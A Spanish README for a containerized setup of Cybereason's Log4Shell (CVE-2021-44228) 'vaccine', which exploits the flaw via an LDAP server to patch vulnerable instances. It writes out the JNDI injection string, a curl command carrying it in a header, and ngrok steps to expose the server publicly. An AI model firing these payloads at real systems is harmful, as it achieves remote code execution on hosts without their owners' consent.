
solucióN docker compose para ejecutar un entorno vacuna para la vulnerabilidad log4j2 CVE-2021-44228
Una forma contenerizada de ejecutar la vacuna log4j ofrecida por Cybereason
Clona este repositorio:
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git
Edita el archivo containers.env para que contenga una IP/DNS privada o pública precisa a la que tu objetivo pueda acceder. ¡La entrada predeterminada probablemente no funcionará para ti!
Construye y ejecuta los contenedores:
docker-compose -f docker-compose.yml -p vaccine up
Ahora tienes un servidor ldap en escucha que servirá la clase Log4jRCE para inocular una instancia vulnerable de log4j.
Puedes exponer esto a internet (si quieres) usando ngrok.
ngrok tcp 1389
Puedes enviar una instancia vulnerable de log4j a esto usando la infame cadena de entrada jndi:
${jndi:ldap://<ngrokurlgoeshere>:1389/a}
Hay una versión deliberadamente vulnerable de log4j en un contenedor disponible en:
Puedes seguir sus instrucciones para iniciarla y usarla para pruebas:
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
Y activar la inoculación mediante:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'